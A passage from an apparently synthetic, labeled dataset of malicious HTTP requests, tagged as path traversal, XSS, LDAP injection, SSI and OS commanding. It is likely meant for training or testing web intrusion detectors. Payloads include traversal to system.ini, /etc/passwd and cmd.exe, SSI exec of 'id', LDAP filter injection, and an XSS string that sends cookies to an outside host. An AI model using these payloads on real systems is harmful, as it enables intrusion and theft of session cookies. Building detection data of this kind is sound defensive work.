Range: 0524-
Referer: http://www.edMkioea.fr/okatnei/bcoazn.mspx
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: os.w34SI http://www.lkep.be
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: 1.0 40.146.129.164, FTP/3.4 3.243.189.169, ooe/1.3 33.111.197.167:3324
Transfer-Encoding: identity
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 851 99.105.244.225 "ewewAqyftpmnve" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 37550564020499
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

hyllnWetuef1kat=evg&3bs4avuceietfg=hudns&riCnc=not$oys&Tlnu4M=replaceep&aNzWrin=-e1go&0dl=bteeetn0Mb&nflfkraujeuzgc=DjeekC&Taccess_log7OJmNq2=aQlUcG0&3z_0d0dWZ=3&4Alelaertepi=328&wzgnTr=572630103&mnnazthN=0deDeGtravmo&ttzetwuarb=iolhrjp28qn1ser5es&7rhi=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini&5ym2FSFand0@0D=rl'

End - Id: 45377
Start - Id: 44848
class: PathTransversal
GET /d8slr6l8ehrtEataWeT/sV/nWRsYXeda.r3UAUlpQ/a2zt.M.lNh7onjoX.js?UMrkMV7Q=co5ieeanE4tm&isn=+tm8a&eu0u2rhitrretea=em&pofaiesi7omvln=file%3A%2F%2F%2Fd%3A%2Foa%2FfTtr9%2F624w.xml&oetmpe=6120612 HTTP/1.1
Host: 30.167.51.142
Connection: sf3rari
Accept: */*
Accept-Charset: windows-1251;q=0.6, x-mac-arabic;q=0.2, windows-1255;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2491
Client-ip: 95.241.148.239
Cookie: sdrqnhdrl=fiRny-ismspsrhf;n7wt=3;9tnaseksqDakbaS=6473561;tpimhe=(5eeanh)Httse;5v0=hhaOwnh;3dhlcittQslu=f es
Cookie2: $Version="94"
Date: Mon, 07 Jun 04 19:01:24 UTC
ETag: W/"eWSmgy4O4E8KbW15NvP"
Expect: 100-continue
From: hohEtsbm@c8e2atu1l.be
If-Modified-Since: Fri, 09 Apr 04 06:39:01 GMT
If-Unmodified-Since: Mon, 02 Jul 07 16:23:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 81
MIME-Version: 3.5
Pragma: nmb1l=wewhttdc
Proxy-Authorization: Basic MG5lZXNrc3Q6Zmtab3ZsczE=
Authorization: Basic ZWNoZWVjOmhnU3Jpbw==
Range: 776321-,6-
Referer: http://www.ceitf.st/g8hmpAw/f0yrto/Tihef8ee/wx6a/timei0.mpeg
TE: gzip;q=0.2,trailers
Trailer: From
User-Agent: eisbTureeststzned
UA-CPU: StrongARM
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 7.1 www.ahda6dE6.jpg:39809, 6.8 www.h2cd6eeg.jpeg:1
Transfer-Encoding: deflate
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 141 5.122.155.98 "97dso" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44848
Start - Id: 48208
class: XSS
POST /id@WJRUjIk/libwiTA0N/iiilv.tiff? HTTP/1.1
Content-Length: 152
Content-Language: ETOxp9,pe
Content-Encoding: identity
Content-Location: /3son.ace
Content-MD5: bmFzeW5sbG1oamFsMU1uRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Dec 05 14:14:36 CET
Last-Modified: Fri, 16 Jan 04 23:42:55 UTC
Host: www.miawnhc.gov
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, euc-tw;q=0.2, x-mac-chinesetrad;q=0.1
Accept-Encoding: deflate;q=0.1
Accept-Language: ea-6ca7n;q=0.1, 6Lcheuh-iYt, pnireeam-tr
Cache-Control: no-transform
Client-ip: 118.134.185.197
Cookie2: $Version="5"
Date: Sat, 06 Oct 07 08:30:04 CET
ETag: W/"DTPVKZ_U4E2_B6CmD"
Expect: iQbird
If-Modified-Since: Mon, 19 Jun 06 14:03:12 UTC
If-Unmodified-Since: Sat, 09 Apr 05 08:35:09 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Sep 08 18:00:42 GMT
Max-Forwards: 62
MIME-Version: 8.6
Pragma: 8otnf='okhtoy'
Authorization: Basic YUJlaWV1OlNwYWw=
Range: 9-78819
Referer: http://www.s4axgme.de/eieoTh/eLouu2en/egtsu7h/esmaea.mdb
TE: deflate,gzip,trailers
User-Agent: <img src   =  "    tindatneta "onmouseover=   "    [document.location.replace   ('http://www.ilsiorar.com/cgi-bin/veniatie.cgi'+document.cookie);]   " >
UA-Pixels: 2557x0166
Via: 5.6 46.24.10.113
Transfer-Encoding: identity
Warning: 893 78.20.40.155 "h9rlthiE7eebet5grc" 
X-Forwarded-For: 16.22.84.83
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Jeuwp-Vo-6=tn0l2as8hn&7871=2958599&@Mpfv9stylevAQ=ileut3opositiondlhdatq/&Hurhinxeo=bInatitettistdi&ml4PLln2=ozUAV&tzisaipauo=3611540&atPtarwo=1085478

End - Id: 48208
Start - Id: 38014
class: LdapInjection
GET /Teq/cir/lv0Artii5lsyne/nehI/woL3emtedniae7efgzeX/4nsoosepdr6poaproHn/oTJ0pBTL/luv66EXAu24Vb/jyb9ethdolinsn.tiff?ate=g6&syianrwhnxu1nai=2&eshyioesh=3&yAdNna0NoeEs2=23932616&pneAalakiolh=oI4i&dhdniisEUa=nhDB.PS6USd&ii=++9+ia6Gre%3B&ap=1627235&UcahDiitdNE9na=esas0%7E3yfdcstmpioofsaa&altseluca=kfodZ50nR&uG4null1lGQ=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&3n=%5B-e4c&dz=lezs HTTP/1.0
Host: www.stcArh.net
Connection: close
Accept: audio/*, text/plain
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 204.64.18.91
Cookie: taNpnti8Aequey=hsg;2Tpnhenebtsh=0986504;arwiOadi=ceinullans;aaef8mowcjtG=eI
Cookie2: $Version="804"
Date: Sat, 26 Jan 08 13:26:10 GMT
ETag: "zGwbkaD56y2_UjA"
Expect: hAenvtnw
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Fri, 10 Jun 05 21:03:45 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Nov 04 22:51:45 UTC
Max-Forwards: 2406
MIME-Version: 8.2
Pragma: dsier=iphxe
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM b2VudUVwaGV0dTRwb2V0Z3RIaW84YXRlZTFybWltaVRyQThvZXRn
Range: 28-,220237-8,8-
Referer: /ipnm/oduiEu/9mOdg/dAot/c0cr8h.jpg
TE: deflate;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/1.4 (compatible; Konqueror/9.5; Linux i586; imrteTw; vitrg; deeiaoeipa)
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 905x8185
Via: FTP/4.4 www.le6gn.html, swktd/1.5 www.EW4tetl.jpeg
Transfer-Encoding: identity
Upgrade: obs/0.4, gbr/5.8
Warning: 576 www.4exea.gif "s8oN" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 800649
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38014
Start - Id: 46373
class: PathTransversal
GET /im8d43U.vPln8mxfS4./EIvpUyXrnfY/thwot20Idsambhsinage/edMDGvBa_I/ri/onygrndewanlp1oniEae/s6tTwalgoOalenirhase.gif?Sk32.O=%2Fetc%2Fpasswd&tagnmeooea=sE3.rsp%40j&tnettaiytdrg=657153&5vbrae=oof4nekhp&jttbEnJ=5Ixyn68heshsi4O&mOy099.=innee&ui=gm&8eiNur9oansinhg=12258462&YhauuaAeEgtata=6800856&ipeldrzh=os&satadu=hucapsW%40%40AGp&0a_zwKqfg77Hcopy=yo2elebi&RMrhQst=motelnetw%3D-siiedropyeytehtle HTTP/1.0
Host: www.l5oi.fr
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874;q=0.9, utf-7;q=0.5, x-mac-chinesesimp;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 214.183.248.166
Cookie: erdnjtHe02ies5=5466476;yeisni7d2exTln=29468591;mdseaa2neeEs=68
Cookie2: $Version="86"
Date: Wed, 26 Mar 08 21:59:15 UTC
ETag: "GFsg.faK@trgN@CsoV"
Expect: aLad45hr=rfp3r;ngee=E8R2
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Sat, 12 Jan 08 21:14:00 UTC
If-Match: "kMla4HoPweULTAzJn"
If-None-Match: "pcMMfBcBpW4B.Uakz"
If-Range: "zOITDYoJbD-BDD6F"
Max-Forwards: 3
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Digest uri=http://iYet.net/eeyag9.jpg
Range: 2-1818,846125-
Referer: http://www.Vuei.st/omh5e.css
TE: trailers,trailers,chunked
Trailer: From
User-Agent: IenOad60aetOoil
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-Color: color8
UA-Pixels: 3216x516
Via: HTTP/1.9 101.177.4.194, Iefdf/2.8 181.122.189.11, 7.4 116.127.38.140
Transfer-Encoding: compress
Upgrade: orts/6.5, cmsg5/8.3, hyR/0.1
Warning: 019 www.7IncbS.jpeg "Lwzurocdatoo" "Fri, 17 Apr 09 01:12:13 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46373
Start - Id: 39989
class: SSI
GET /pZM-pxpo7SDojGIY/6d3nrnin1tircT5vp/hwats5P/0nrh.exe?EUEpiA_0=631042&rl1usraYnIpfwr=aaD%25osn42ciea&irmw=%3C%21++%23%3C%21--++++%23exec+cmd%3D%22id%22--%3E&ya1irtihnrguta=ha&ssxas1odMr=sqte0xtineunsutze&ttgihlet=445391&wnBnlIcehd=th+smi%25&3PMT=stdin%7Ce&2lPnX_2i=8296&rndbNte=sgovOhb&ewoas2=2HCg0HsxvTm&m3sp=lewut HTTP/1.1
Host: www.Nuoa.fr
Connection: keep-alive
Accept: audio/basic, text/xml
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 190.94.5.54
Cookie: thwnotdokoO=nl he;@wK2=5729554;c0etErn9uetkrr=ssalpNorHeurtuwm;262RDu=yateiack;etoYEltlbPbi=tb@63PrK;Ty9sLond6e=90523200
Cookie2: $Version="941"
Date: Sun, 30 Mar 08 01:17:48 UTC
ETag: "Y5G0r-gDV1rDCTn"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 06 Jun 05 18:21:19 GMT
If-Match: "1LqEmkBlrru8b4xe7"
If-None-Match: "9a-dDsrLxzgaIaW2"
If-Range: "AyU79til7WQU68Ax5o"
Max-Forwards: 163
MIME-Version: 3.3
Pragma: 71h=sO
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: Digest realm
Range: 618-573,4-,461-
Referer: /eeah/eni6oe/dbtsl/saQe8e.tiff
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: pasmhg4m0/9.5.6.9.4
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 860x1351
Via: 7.7 55.186.40.20, FTP/0.5 133.189.194.91
Transfer-Encoding: deflate
Upgrade: eah/7.3, distu9/4.6
Warning: 290 148.92.115.227 "Saldeawbr" "Sat, 24 Jun 06 18:34:59 UTC"
X-Serial-Number: 754321
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39989
Start - Id: 38949
class: LdapInjection
GET /7@7k5xY-Ge3/wgqrIl6stNskaaH/d8HJCZtY0Jf6NC/Gtntnen17en1uwe/v68sf0@kQ/lUG2Tt6RE/uwta0cniir/dJFhxm/edyOZWGQBT920/exMQL-b3F3PTtUQal5/juCnu_vQeKSmpT@.jpg?aaa=nwii%3DtincludeltelnettGn+a&rztifdwxstlZh=o&5dsberajeIEata=1&from8xin=%7Eixrssghsghtoe&oadminqk=sNph%400et%2B&ct6rq=ln&a6e6Rohtns=RaiTlecw+tc%24t&ebbeoapms=wheF%29%28++%7C+++%28cHy0b%3D*%29 HTTP/1.0
Host: www.HennENeo.it:98
Connection: itbe
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 69.146.201.136
Cookie: o6dor0ese=Eeltngue3ulwnh;MqAsystemk8CI=svnALMwTN;Vd27=y;uetrEiaonr=Swr=o4td<me atx wl;e9srMrr=07
Cookie2: $Version="8"
Date: Sat, 24 Mar 07 13:57:48 GMT
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 7onuerm
From: merdf@ssdhtag.cz
If-Modified-Since: Tue, 27 May 08 14:21:04 UTC
If-Unmodified-Since: Mon, 09 Nov 09 09:07:09 CET
If-Match: "_KGCGIjngOU45m@wrC3"
If-None-Match: *
If-Range: Wed, 10 Mar 04 14:59:01 GMT
Max-Forwards: 3
MIME-Version: 6.2
Pragma: a6cdani='regA'
Proxy-Authorization: Basic cncwbnU6dHRpSGFhd28=
Authorization: Basic ZTFhbHI6c2FoMmlzdA==
Range: 678-706492,70758-,6439-
Referer: http://www.triann.gov/rfNeg/iefr/htaAri/odbsv/mTvBvgng.pdf
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 7.3; 1o-ee; rv:6.7.8) Gecko/91038175
UA-CPU: 68000
UA-Disp: 4990,2701,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: 6.1 www.fnnles.html:56082
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 175 55.57.212.248 "yxhnh1o3It" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38949
Start - Id: 40788
class: SSI
GET /dY_KB2imgb@qOED/yaUatz/bNe_1gABlz/pycToiIrato4aaP.cfm?yPa0=eis4N75Z&3hhtnoiasioe=%3C%21--++++%23odbc+++statement%3D++%22select+HanW9n%2C++nws%2C++hio+from++++EOrys++order+by+1%2C+56%2C++++0%22++++--%3E HTTP/1.0
Host: www.54nrtdinu.gov
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252, x-mac-arabic
Accept-Encoding: gzip;q=0.9, identity;q=0.9, compress, compress, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 79.174.208.245
Cookie: TGPFbmetai=ocwxitn4onse133lq;Pxesoe8nIlnnE=sEr4@T_txDr;andcWenzdljj=(;tnlsdaq0TlhHjsn=01;qLwY3tc=99;fisS9=6444906
Cookie2: $Version="363"
Date: Thu, 14 Jan 10 08:18:08 UTC
ETag: W/"CdZf9lIoJFZXle@@n"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: ascuos0E@tWoesp.de
If-Modified-Since: Fri, 27 Mar 09 07:20:45 GMT
If-Unmodified-Since: Fri, 30 May 08 15:26:43 GMT
If-Match: "V04sxmqFmdOGDxz6"
If-None-Match: *
If-Range: *
Max-Forwards: 3980
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM T3Zob2lzcW5lcmxidmVubnNpcmYzZGVmdGNyM3Vod2xvdGJs
Authorization: Gb9a uOywAra=bOuweTbi
Range: 6294-616374
Referer: http://scoejoh.cz/ofreHS/OaCtiv/taecdSl/urrt.bin
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/9.6 (Machintosh; U; PPC Mac OS X 5.1; ie-lg; rv:9.9.1) Gecko/17043461
UA-Disp: 4103,847,16
UA-OS: Win98
UA-Pixels: 4833x5333
Via: HTTP/4.9 www.dlssdt.png, HTTP/2.9 www.jsruet.jpg
Transfer-Encoding: compress
Upgrade: hfheyu/3.0, aae/3.8, rsayt/5.1, moh1r/4.2, ryonhi/6.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40788
Start - Id: 39890
class: SSI
GET /ea1pmnohgtsGhEtkbc/lrPWP9kFWVDPP-9aJ/pjJUe/e46/nw.tiff? HTTP/1.1
Host: www.gdeiofki.org
Connection: lg0Oag9
Accept: */*;q=0.3
Accept-Charset: iso-8859-4, shift_jis;q=0.6
Accept-Encoding: deflate, gzip, identity;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 213.129.44.0
Cookie: imtC=<!     #<!--  #exec     cmd="id"-->;idmnohnmenrXeao=hxEt ;ar8mo1y4ishs=p5LerSDOuHN
Cookie2: $Version="420"
Date: Sat, 16 May 09 05:46:29 CET
ETag: "2.Ew532gQ20CBaeN"
If-Modified-Since: Sun, 28 Jun 09 08:27:09 UTC
If-Unmodified-Since: Fri, 03 Jul 09 15:11:36 CET
If-Match: *
If-None-Match: "5ExY-74jxg4Bz@gsEtwh"
If-Range: *
Max-Forwards: 80
Pragma: no-cache
Authorization: ARiq ticAs=5jyle
Range: -4,448-06
Referer: http://eIwio.de/sanelecd/ct4ddc/o0xSrEmE.tiff
TE: trailers,gzip;q=0.9,trailers
Trailer: From
User-Agent: srEpshi (hSbxLFX50; ooDWuzKXwE; sGPfmk; 2Loxcg)
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3629x6532
Via: yaiee/9.8 109.191.67.14, 3.1 www.gphhnhzt.jpg:10, 4.1 www.asn3.js:9666
Transfer-Encoding: e60nne
Upgrade: aetsc/0.4, red7/5.0, oeU/9.1, t3w/1.7
Warning: 848 www.rdgPhyz.jpg "ajneobalRlcsrGga" 
X-Forwarded-For: 166.113.235.26
----: -------------------

null

End - Id: 39890
Start - Id: 43918
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.uomL.cz
Connection: e8iekaa
Accept: audio/basic, image/*
Accept-Charset: hz-gb-2312, x-mac-chinesesimp
Accept-Encoding: *;q=0.2
Accept-Language: wle-m;q=0.1, ro-8n, U-nof6h7h, id-hipda;q=0.5
Cache-Control: no-store
Client-ip: 22.30.133.135
Cookie: C4id5ehttps=[? p;Wseu=logatzloghttpsrs rrahoilm s;issm1h5g=hze?s;ymseepai6efrmae=seo;pntspre2cRkggen=0539052709
Cookie2: $Version="7"
Date: Mon, 30 Mar 09 14:33:50 GMT
ETag: W/"vie1Rh-65y4FyKK@u97g"
Expect: iahe=MeGsltt;ntEYm3e
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Thu, 27 Jan 05 17:52:30 GMT
If-Unmodified-Since: Thu, 04 Feb 10 23:44:25 UTC
If-Match: "wUYpfCXl6otd5uZX"
If-None-Match: *
If-Range: Sun, 17 Dec 06 16:19:22 CET
Max-Forwards: 25
MIME-Version: 9.1
Pragma: tdyolyra='errcjd3i'
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: Basic ZXNjUkM3bTplUHNsalE=
Range: 6652-,-36477,66590-93
Referer: http://li6i.st/easnsoo/eroolo.aspx
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/4.6 (Windows; U; Win98 3.1; os-vr; rv:0.0.0) Gecko/12710069
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: 6.3 www.isUmifr.jpeg, HTTP/2.8 www.ohw2g.jpeg:1
Transfer-Encoding: 3pir; riee=oetd
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 652 www.cj2n.js "tUqerstihiehees" "Fri, 02 Mar 07 15:13:56 CET"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43918
Start - Id: 44324
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 83.214.170.186
Connection: close
Accept: text/xml;q=0.5, text/*;q=0.9
Accept-Charset: utf-7;q=0.8, x-mac-korean;q=0.6, iso-8859-4, windows-1251, cp-936
Accept-Encoding: *;q=0.5
Accept-Language: e-a4so, aBa-ouorm0a, r4nioaoq-1oTlmt, q-5a, f-ktdart
Cache-Control: no-store
Client-ip: 224.122.29.23
Cookie: tcss=00;W4Zdxz-=d&)gpasswdemr y]idoeG
Cookie2: $Version="7"
Date: Sat, 12 Sep 09 23:47:37 CET
ETag: "8n0SdKaafzTrTySu-@"
Expect: Isdeea8T=dvor7
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "LRG0pPP2XtqJ6AhBRLhw"
If-None-Match: *
If-Range: Wed, 15 Aug 07 13:16:52 UTC
Max-Forwards: 993
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: NTLM cGxwYWFlb3FtU055a2VhaEUzdGVkbjJ0bjlhYnR3aWVvemFteU4=
Range: 88-15414
Referer: http://www.chtqh.fr/Snioy/otftsj/peivhmio/u9zace8.asmx
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/2.3 (X11; U; Open BSD i586 9.9; t2-ry; rv:9.0.8) Gecko/33330480
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 127x111
Via: 4.0 www.ttekp.shtml, FTP/3.1 224.85.199.129
Transfer-Encoding: compress
Upgrade: tzsa/1.2, i18be/3.4, iXa/9.5
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44324
Start - Id: 48179
class: XSS
POST /amlxpaneseotb/beefeses8oetjvaisiM/pkNKcyJZQF9H/eIusrjacceptbD4sGd7Vc/fegTg5ZFjuqkG/ePHCOPB.jpeg? HTTP/1.0
Content-Length: 88
Content-Language: p0afoia,tni,8
Content-Encoding: compress
Content-Location: /esqaod/sa9n3vn/ct8lafo2/tuwt6n/ef2s.php4
Content-MD5: c29lZ2tnY2l0aW9uZ2VyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Nov 06 16:51:52 GMT
Last-Modified: Fri, 26 Sep 08 17:04:41 GMT
Host: 229.195.250.171
Connection: close
Accept: text/*;q=0.9, audio/basic;q=0.7, text/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, gzip;q=0.4
Accept-Language: 8eis4"        ><body%20onload=alert(document.cookie); >
Cache-Control: only-if-cached
Client-ip: 148.144.232.153
Cookie: ntpx44=o w$ip&tnib9qF;1vFdeleteyZ=hnsgs;Fahey9ntC5hhlo=0664062;tRaaixfiseft=wliboulzmboot.inisWeTlSea2wm;or20hearaosso=sxrtsobxtis0ie8s
Cookie2: $Version="19"
Date: Thu, 08 Sep 05 21:23:05 GMT
ETag: "k2MsT_9XICd6AdZ"
Expect: 100-continue
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Fri, 06 Apr 07 01:26:16 GMT
If-Unmodified-Since: Tue, 29 Jul 08 12:34:07 GMT
If-Match: "W8BJPu0fB2QzhcdB"
If-None-Match: *
If-Range: "cy@TSP4EVaYtOMGE5sh"
Max-Forwards: 7
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="Nbcsty"
Authorization: Digest nc=11B11BAE
Range: 252-,4-47,9983-
Referer: /usRe/wc28e4/akth8nd.php3
TE: trailers,chunked,chunked
Trailer: Range
User-Agent: h0dcTsOMvj http://www.NcyyeIoa.cz
UA-CPU: 68000
UA-Disp: 926,8217,8
UA-Color: color8
Via: nnejr/7.8 www.ao29s5e.png, he7/6.3 www.icma.css, HTTP/0.6 233.25.126.221
Transfer-Encoding: deflate
Upgrade: r2dRSs/0.4, rrC/1.6
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 203.248.86.3
X-Serial-Number: 43100124354483
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3SKGIO@EV=91&doioieTh6=253701742&a2ep26t=eis&where&ogq=0a&x5beUHsxf.=76&cAehanyeh=8twm

End - Id: 48179
Start - Id: 37712
class: LdapInjection
PUT /gascript/cR7zY483wPv7/dcsIjhaees/hTtLSMT/yMvymO2itcss/acrbel3pfteezcahmmr/eieohes/3E2yUyhEtUu83sygo7M/nt2/exodaXy9PnSB2zTN7O28/tpcWmiesAt/toato1.mdb? HTTP/1.0
Content-Length: 57
Content-Language: aah6sia3,i,5fsw
Content-Encoding: identity
Content-Location: http://www.eHwo0pIe.cz/cefu/iPamhzy/jeortee.txt
Content-MD5: cjluNjhzb3RoZXR0ZHJzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Feb 07 05:51:42 UTC
Last-Modified: Tue, 29 Sep 09 04:35:16 GMT
Host: 6.118.21.46:4
Connection: jedr
Accept: video/*;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: of-raaoti;q=0.9, dlwroIuD-etcE7h
Cache-Control: only-if-cached
Client-ip: 201.29.56.23
Cookie: daestreLitiv=q;Eo=mhneIeaser;snoteeeprngtBw=4o5aa7gvtaneeleo
Cookie2: $Version="321"
Date: Sat, 27 Mar 04 11:11:02 UTC
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: "gYAAsNsvRjUtupT"
If-None-Match: "iWbkGij.vSxm----w"
If-Range: Mon, 31 Jul 06 10:33:05 CET
Max-Forwards: 8
Pragma: no-cache
Authorization: NTLM U2VhdWVyZUFuc21laG5pZWFwMXd5aGVleWNvY3JhQWVlbWxTdA==
Referer: http://6arpoyel.st/4lswh/nSksgrdl.php4
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 4.3; ap-78; rv:5.4.2) Gecko/21619265
UA-CPU: MIPS
UA-Disp: 999,847,16
UA-Color: color16
UA-Pixels: 8766x859
Via: 4.1 0.232.200.177:4, 7.3 127.159.87.14, 6.1 www.eetnf.tiff
Transfer-Encoding: gde8
Upgrade: beagd/0.0, 8at/9.9, elr/1.5, luY/7.5
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321
~~~~~: ~~~~~~~~~~~

Dmedarn=")(targetfilter=(o=NetscapeRoot))

End - Id: 37712
Start - Id: 47820
class: XSS
GET /UqzW-g./hT3JrqoCl/fspDEkiN/d7lWBtselect9vargN/suWVWc0O9U7/nMOGYoFZFIRXANYW7qmf/eu/9it/ss8reo3e.tiff?dh=4OPXz7ZSpuku&ntc10nco=%3Cform%2Bname%3DVR9nq%3E%3Cselect%2Bname%3DiIteT++++%3Ehttp%3A%2F%2Fwww.et.com%2Fenlwe%2F%3F%3C%2Fselect+++%3E%3C%2Fform++++%3E&m0Vhcaty=i7mts&nr2n=aHxXZM_0&s3ihaWsohgM=t&fotty8dzhe=23&7EK5=l&XconnectautoexecY0tgC=e2uw0d_R&tklsHQFobS=2l9zk&eoha=hv3C6EoL&nidfA=6786&qC@Ub.ancq=hs HTTP/1.0
Host: 40.87.104.62
Connection: close
Accept: audio/basic;q=0.9, text/*, application/*
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.6, compress, deflate;q=0.7, deflate, identity
Accept-Language: Dfn-a4t;q=0.4
Cache-Control: no-store
Client-ip: 203.124.10.83
Cookie: jlnHmg=nescma1zrolinkue;L-1RLzMO@Y=>mo;HU0RXG@=twaeNwslhfoe
Cookie2: $Version="3"
Date: Wed, 11 Aug 04 20:32:55 UTC
ETag: W/"OurwtpibD7A0noXC"
Expect: 100-continue
From: aelcese@ohx6uolgc.ch
If-Modified-Since: Mon, 20 Sep 04 19:28:13 UTC
If-Unmodified-Since: Mon, 06 Oct 08 05:39:25 UTC
If-Match: "XVVTKC225F9ebrSGYX"
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: "Lup-HA1c3p_VigCgcO2R"
Max-Forwards: 5647
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: NTLM YWJvYXBzbmNuZWhrbHNlT05taHR0dHRJYWlpbktpdGlnZG1t
Range: 2820-37,-5180,81-
